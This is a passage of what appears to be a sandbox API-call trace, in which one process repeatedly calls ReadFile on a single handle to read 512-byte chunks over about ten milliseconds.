ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.757] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.758] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.759] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.760] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.761] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.762] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.763] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.764] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.765] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.766] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.767] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.768] ReadFile 